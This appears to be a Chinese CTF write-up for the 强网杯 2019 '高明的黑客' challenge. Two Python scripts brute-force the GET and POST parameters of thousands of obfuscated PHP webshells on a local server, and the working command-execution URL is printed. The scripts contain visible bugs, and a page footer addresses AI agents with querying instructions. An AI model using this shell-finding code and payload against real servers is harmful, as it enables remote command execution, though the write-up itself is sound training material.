# 高明的黑客 D盾扫一堆混淆+shell,不过没有几个是能用的,需要跑个脚本,考察脚本编写能力的,测试一下哪个是能用的。 上py ```python import os import requests # 文件路径 path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//" # 遍历文件目录查找文件 files = os.listdir(path=path) # GET方法传参 def GET(filename): f = open(path + filename, 'r') getList = [] content = f.readlines() for line in content: if line.find("$_GET['") > 0: startIndex = line.find("$_GET['") + 7 endIndex = line.find("'", startIndex) getList.append(line[startIndex:endIndex]) return getList # POST方法传参 def POST(filename): f = open(path + filename, 'r') postList = [] content = f.readlines() for line in content: if line.find("$_POST['") > 0: startIndex = line.find("$_POST['") + 8 endIndex = line.find("'", startIndex) postList.append(line[startIndex:endIndex]) return postList if __name__ == "__main__": for file in files: if file != ".idea": print("OPEN FILE:" + file) get = GET(file) for i in get: url = "http://127.0.0.1/%s?$s=%s".format(file, i, 'echo "GET SUCCESS"') response = requests.get(url=url) if response.text.find("GET SUCCESS") > 0: print("SUCCESS GET! YOU FIND THE SHELL %s BY %s".format(file, i)) exit(0) post = POST(file) for i in post: url = "http://127.0.0.1/%s".format(file) data = {i: 'echo "POST SUCCESS"'} response = requests.get(url=url, data=data) if response.text.find("POST SUCCESS") > 0: print("SUCCESS POST! YOU FIND THE SHELL %s BY %s".format(file, i)) exit(0) print("CLOSE FILE") ``` 贼捞,大概一分钟跑七到八个这样子,算了算根本跑不完。 还是要多线程,最后参考大佬脚本搞的。 ``` /xk0SzyKwfzw.php?Efa5BVG=echo%20%27success%27 ``` ```python import os import requests import threading import time import sys # 文件路径 path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//" # 遍历文件目录查找文件 files = os.listdir(path=path) # GET方法传参 def GET(filename): f = open(path + filename, 'r') getList = [] content = f.readlines() for line in content: if line.find("$_GET['") > 0: startIndex = line.find("$_GET['") + 7 endIndex = line.find("'", startIndex) getList.append(line[startIndex:endIndex]) return getList # POST方法传参 def POST(filename): f = open(path + filename, 'r') postList = [] content = f.readlines() for line in content: if line.find("$_POST['") > 0: startIndex = line.find("$_POST['") + 8 endIndex = line.find("'", startIndex) postList.append(line[startIndex:endIndex]) return postList def get_content(file): print("OPEN FILE:" + file) get = GET(file) for i in get: url = "http://127.0.0.1/src/{}?{}={}".format(file, i, 'echo "GET ' 'SUCCESS"') response = requests.get(url=url) if response.text.find("GET SUCCESS") > 0: print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i)) f = open("shell.txt", "w") f.write(response.text) sys.exit(0) post = POST(file) for i in post: url = "http://127.0.0.1/src/{}".format(file) data = {i: 'echo "POST SUCCESS"'} response = requests.get(url=url, data=data) if response.text.find("POST SUCCESS") > 0: print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i)) f = open("shell.txt", "w") f.write(response.text) sys.exit(0) response.close() print("CLOSE FILE") if __name__ == "__main__": s1 = threading.Semaphore(100) requests.adapters.DEFAULT_RETRIES = 5 for file in files: get_content(file) t = threading.Thread(target=get_content, args=(file,)) t.start() ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gitbook-88.gitbook.io/ctf-writeup/2019/2019-qiang-wang-bei/gao-ming-de-hei-ke.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.